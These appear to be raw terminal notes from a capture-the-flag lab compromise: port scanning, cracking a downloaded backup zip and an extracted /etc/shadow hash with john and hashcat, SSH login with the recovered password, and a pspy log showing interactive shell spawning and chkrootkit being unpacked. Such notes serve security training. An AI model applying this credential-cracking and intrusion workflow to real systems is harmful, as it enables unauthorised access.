



└─$ nmap -p- 172.16.33.40 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-11 22:48 EDT
Nmap scan report for 172.16.33.40
Host is up (0.039s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 35.81 seconds





┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u http://172.16.33.40 -f php,html,txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                 
 (_||| _) (/_(_|| (_| )                                                                                                          
                                                                                                                                 
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 26763

Output File: /home/kali/reports/http_172.16.33.40/_24-07-11_22-51-52.txt

Target: http://172.16.33.40/

[22:51:52] Starting:                                                                                                             
[22:51:54] 403 -  277B  - /.ht_wsr.txt                                      
[22:51:54] 403 -  277B  - /.htaccess.bak1                                   
[22:51:54] 403 -  277B  - /.htaccess.sample                                 
[22:51:54] 403 -  277B  - /.htaccess.orig
[22:51:54] 403 -  277B  - /.htaccess.save
[22:51:54] 403 -  277B  - /.htaccess_orig                                   
[22:51:54] 403 -  277B  - /.htaccess_sc
[22:51:54] 403 -  277B  - /.htaccess_extra
[22:51:54] 403 -  277B  - /.htaccessBAK
[22:51:54] 403 -  277B  - /.htaccessOLD
[22:51:54] 403 -  277B  - /.htaccessOLD2
[22:51:55] 403 -  277B  - /.html                                            
[22:51:55] 403 -  277B  - /.htm
[22:51:55] 403 -  277B  - /.htpasswd_test                                   
[22:51:55] 403 -  277B  - /.htpasswds                                       
[22:51:55] 403 -  277B  - /.httr-oauth                                      
[22:51:55] 403 -  277B  - /.php                                             
[22:52:29] 403 -  277B  - /icons/                                           
[22:52:50] 403 -  277B  - /server-status                                    
[22:52:51] 403 -  277B  - /server-status/                                   
                                                                             
Task Completed                                                                                                                   
                                      

#under 80 page, download a zip file, save,zip

┌──(kali㉿kali)-[~/Downloads]
└─$ zip2john save.zip > save.hash  

└─$ cat save.hash 
save.zip:$pkzip$6*1*1*0*8*24*8759*a7409df1d7a76ad3809794d387209855bb7638aa589d5be62b9bf373d78055e1dd351925*1*0*8*24*1535*459926ee53809fa53fe26c3e4548cd7819791a638c8d96d3ec7cf18477ffa1e9e2e77944*1*0*8*24*834f*7d2cbe98180e5e9b8c31c5aec89c507011d26766981d17d249e5886e51ac03270b009d62*1*0*8*24*8d07*7d51a96d3e3fa4083bbfbe90ee97ddba1f39f769fcf1b2b6fd573fdca8c97dbec5bc9841*1*0*8*24*90ab*f7fe58aeaaa3c46c54524ee024bd38dae36f3110a07f1e7aba266acbf8b5ff0caf42e05e*2*0*2d*21*d9c379a9*9b9*46*0*2d*8ce8*aae40dfa55b72fd591a639c8c6d35b8cabd267f7edacb40a6ddf1285907b062c99ec6cc8b55d9f0027f553a44f*$/pkzip$::save.zip:etc/hostname, etc/hosts, etc/sudoers, etc/shadow, etc/group, etc/passwd:save.zip

└─$ john save.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 3 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
manuel           (save.zip)     
1g 0:00:00:00 DONE 2/3 (2024-07-11 23:03) 5.555g/s 432505p/s 432505c/s 432505C/s 123456..Open
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

└─$ unzip save.zip
Archive:  save.zip
[save.zip] etc/passwd password: 
  inflating: etc/passwd              
  inflating: etc/shadow              
  inflating: etc/group               
  inflating: etc/sudoers             
  inflating: etc/hosts               
 extracting: etc/hostname  

#the content of shadow
┌──(kali㉿kali)-[~/Downloads/etc]
└─$ cat shadow  
root:$6$RucK3DjUUM8TjzYJ$x2etp95bJSiZy6WoJmTd7UomydMfNjo97Heu8nAob9Tji4xzWSzeE0Z2NekZhsyCaA7y/wbzI.2A2xIL/uXV9.:18450:0:99999:7:::
daemon:*:18440:0:99999:7:::
bin:*:18440:0:99999:7:::
sys:*:18440:0:99999:7:::
sync:*:18440:0:99999:7:::
games:*:18440:0:99999:7:::
man:*:18440:0:99999:7:::
lp:*:18440:0:99999:7:::
mail:*:18440:0:99999:7:::
news:*:18440:0:99999:7:::
uucp:*:18440:0:99999:7:::
proxy:*:18440:0:99999:7:::
www-data:*:18440:0:99999:7:::
backup:*:18440:0:99999:7:::
list:*:18440:0:99999:7:::
irc:*:18440:0:99999:7:::
gnats:*:18440:0:99999:7:::
nobody:*:18440:0:99999:7:::
_apt:*:18440:0:99999:7:::
systemd-timesync:*:18440:0:99999:7:::
systemd-network:*:18440:0:99999:7:::
systemd-resolve:*:18440:0:99999:7:::
messagebus:*:18440:0:99999:7:::
avahi-autoipd:*:18440:0:99999:7:::
sshd:*:18440:0:99999:7:::
avahi:*:18440:0:99999:7:::
saned:*:18440:0:99999:7:::
colord:*:18440:0:99999:7:::
hplip:*:18440:0:99999:7:::
systemd-coredump:!!:18440::::::
296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::

#create a file for hashcat to get the passwd of  host  296640a3b825115a47b68fc44501c828
└─$ cat roo.hash 
$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.

┌──(kali㉿kali)-[~/Downloads]
└─$ hashcat -m 1800 roo.hash rockyou.txt /usr/share/hashcat/rules/best64.rule --force
hashcat (v6.2.6) starting

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i5-1155G7 @ 2.50GHz, 1439/2943 MB (512 MB allocatable), 3MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Uses-64-Bit

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB


Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:server
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: $6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2Bj...ZV0us.
Time.Started.....: Fri Jul 12 04:52:45 2024, (30 secs)
Time.Estimated...: Fri Jul 12 04:53:15 2024, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/2 (50.00%)
Speed.#1.........:      570 H/s (14.32ms) @ Accel:96 Loops:512 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 17088/14344385 (0.12%)
Rejected.........: 0/17088 (0.00%)
Restore.Point....: 16992/14344385 (0.12%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4608-5000
Candidate.Engine.: Device Generator
Candidates.#1....: yomisma -> jennica
Hardware.Mon.#1..: Util: 95%

Started: Fri Jul 12 04:52:10 2024
Stopped: Fri Jul 12 04:53:16 2024

#get the passwd server
# try to  ssh by using hostname xx














296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502/logs$ cat log.txt 
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/06/27 18:56:57 CMD: UID=0    PID=9      | 
2020/06/27 18:56:57 CMD: UID=0    PID=8      | 
2020/06/27 18:56:57 CMD: UID=1000 PID=7659   | /bin/bash 
2020/06/27 18:56:57 CMD: UID=1000 PID=7658   | python -c import pty;pty.spawn('/bin/bash') 
2020/06/27 18:56:57 CMD: UID=1000 PID=7657   | /bin/sh -i 
2020/06/27 18:56:57 CMD: UID=1000 PID=7653   | sh -c uname -a; w; id; /bin/sh -i 
2020/06/27 18:56:57 CMD: UID=1000 PID=7652   | php -S 0.0.0.0:8080 
2020/06/27 18:56:57 CMD: UID=1000 PID=7645   | php -S 0.0.0.0:8080 
2020/06/27 18:56:57 CMD: UID=0    PID=6      | 
2020/06/27 18:56:57 CMD: UID=0    PID=59     | 
2020/06/27 18:56:57 CMD: UID=0    PID=50     | 
2020/06/27 18:56:57 CMD: UID=0    PID=49     | 
2020/06/27 18:56:57 CMD: UID=0    PID=481    | -bash 
2020/06/27 18:56:57 CMD: UID=0    PID=48     | 
2020/06/27 18:56:57 CMD: UID=0    PID=471    | (sd-pam) 
2020/06/27 18:56:57 CMD: UID=0    PID=470    | /lib/systemd/systemd --user 
2020/06/27 18:56:57 CMD: UID=0    PID=467    | sshd: root@pts/0     
2020/06/27 18:56:57 CMD: UID=0    PID=424    | /usr/sbin/sshd -D 
2020/06/27 18:56:57 CMD: UID=0    PID=423    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2020/06/27 18:56:57 CMD: UID=0    PID=422    | /usr/sbin/cups-browsed 
2020/06/27 18:56:57 CMD: UID=107  PID=420    | avahi-daemon: chroot helper 
2020/06/27 18:56:57 CMD: UID=0    PID=402    | /usr/sbin/cupsd -l 
2020/06/27 18:56:57 CMD: UID=0    PID=401    | /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant 
2020/06/27 18:56:57 CMD: UID=104  PID=400    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only                                                                                                           
2020/06/27 18:56:57 CMD: UID=0    PID=4      | 
2020/06/27 18:56:57 CMD: UID=0    PID=399    | /usr/sbin/cron -f 
2020/06/27 18:56:57 CMD: UID=0    PID=398    | /lib/systemd/systemd-logind 
2020/06/27 18:56:57 CMD: UID=107  PID=396    | avahi-daemon: running [60832e9f188106ec5bcc4eb7709ce592.local] 
2020/06/27 18:56:57 CMD: UID=0    PID=395    | /usr/sbin/rsyslogd -n -iNONE 
2020/06/27 18:56:57 CMD: UID=0    PID=390    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                                                                  
2020/06/27 18:56:57 CMD: UID=0    PID=30     | 
2020/06/27 18:56:57 CMD: UID=0    PID=3      | 
2020/06/27 18:56:57 CMD: UID=0    PID=294    | 
2020/06/27 18:56:57 CMD: UID=0    PID=292    | 
2020/06/27 18:56:57 CMD: UID=0    PID=29     | 
2020/06/27 18:56:57 CMD: UID=0    PID=28     | 
2020/06/27 18:56:57 CMD: UID=0    PID=27     | 
2020/06/27 18:56:57 CMD: UID=0    PID=26     | 
2020/06/27 18:56:57 CMD: UID=101  PID=255    | /lib/systemd/systemd-timesyncd 
2020/06/27 18:56:57 CMD: UID=0    PID=25     | 
2020/06/27 18:56:57 CMD: UID=0    PID=245    | /lib/systemd/systemd-udevd 
2020/06/27 18:56:57 CMD: UID=0    PID=24     | 
2020/06/27 18:56:57 CMD: UID=0    PID=23     | 
2020/06/27 18:56:57 CMD: UID=0    PID=222    | /lib/systemd/systemd-journald 
2020/06/27 18:56:57 CMD: UID=0    PID=22     | 
2020/06/27 18:56:57 CMD: UID=0    PID=21     | 
2020/06/27 18:56:57 CMD: UID=0    PID=20     | 
2020/06/27 18:56:57 CMD: UID=0    PID=2      | 
2020/06/27 18:56:57 CMD: UID=0    PID=190    | 
2020/06/27 18:56:57 CMD: UID=0    PID=19     | 
2020/06/27 18:56:57 CMD: UID=0    PID=189    | 
2020/06/27 18:56:57 CMD: UID=0    PID=187    | 
2020/06/27 18:56:57 CMD: UID=0    PID=18     | 
2020/06/27 18:56:57 CMD: UID=0    PID=17     | 
2020/06/27 18:56:57 CMD: UID=0    PID=16     | 
2020/06/27 18:56:57 CMD: UID=0    PID=153    | 
2020/06/27 18:56:57 CMD: UID=0    PID=15     | 
2020/06/27 18:56:57 CMD: UID=0    PID=14     | 
2020/06/27 18:56:57 CMD: UID=0    PID=12378  | ./pspy 
2020/06/27 18:56:57 CMD: UID=0    PID=12356  | 
2020/06/27 18:56:57 CMD: UID=0    PID=12299  | -bash 
2020/06/27 18:56:57 CMD: UID=0    PID=12293  | sshd: root@pts/2     
2020/06/27 18:56:57 CMD: UID=0    PID=12275  | 
2020/06/27 18:56:57 CMD: UID=0    PID=12248  | 
2020/06/27 18:56:57 CMD: UID=0    PID=12247  | 
2020/06/27 18:56:57 CMD: UID=0    PID=12178  | 
2020/06/27 18:56:57 CMD: UID=0    PID=12121  | 
2020/06/27 18:56:57 CMD: UID=0    PID=12     | 
2020/06/27 18:56:57 CMD: UID=0    PID=112    | 
2020/06/27 18:56:57 CMD: UID=0    PID=110    | 
2020/06/27 18:56:57 CMD: UID=0    PID=11     | 
2020/06/27 18:56:57 CMD: UID=0    PID=108    | 
2020/06/27 18:56:57 CMD: UID=0    PID=107    | 
2020/06/27 18:56:57 CMD: UID=0    PID=105    | 
2020/06/27 18:56:57 CMD: UID=0    PID=104    | 
2020/06/27 18:56:57 CMD: UID=0    PID=102    | 
2020/06/27 18:56:57 CMD: UID=0    PID=10     | 
2020/06/27 18:56:57 CMD: UID=0    PID=1      | /sbin/init 
2020/06/27 18:56:58 CMD: UID=0    PID=12385  | -bash 
2020/06/27 18:56:58 CMD: UID=0    PID=12386  | tar -xvzf chkrootkit-0.49.tar.gz 
2020/06/27 18:57:04 CMD: UID=0    PID=12389  | -bash 
2020/06/27 18:57:04 CMD: UID=0    PID=12390  | -bash 
2020/06/27 18:57:04 CMD: UID=0    PID=12391  | -bash 
2020/06/27 18:57:05 CMD: UID=0    PID=12392  | -bash 
2020/06/27 18:57:05 CMD: UID=0    PID=12393  | -bash 
2020/06/27 18:57:06 CMD: UID=0    PID=12394  | -bash 
2020/06/27 18:57:06 CMD: UID=0    PID=12395  | -bash 
2020/06/27 18:57:06 CMD: UID=0    PID=12396  | -bash 
2020/06/27 18:57:06 CMD: UID=0    PID=12397  | -bash 
2020/06/27 18:57:06 CMD: UID=0    PID=12398  | -bash 
2020/06/27 18:57:06 CMD: UID=0    PID=12399  | -bash 
2020/06/27 18:57:07 CMD: UID=0    PID=12400  | -bash 
2020/06/27 18:57:07 CMD: UID=0    PID=12401  | -bash 
2020/06/27 18:57:07 CMD: UID=0    PID=12402  | -bash 
2020/06/27 18:57:07 CMD: UID=0    PID=12403  | -bash 
Exiting program... (interrupt)
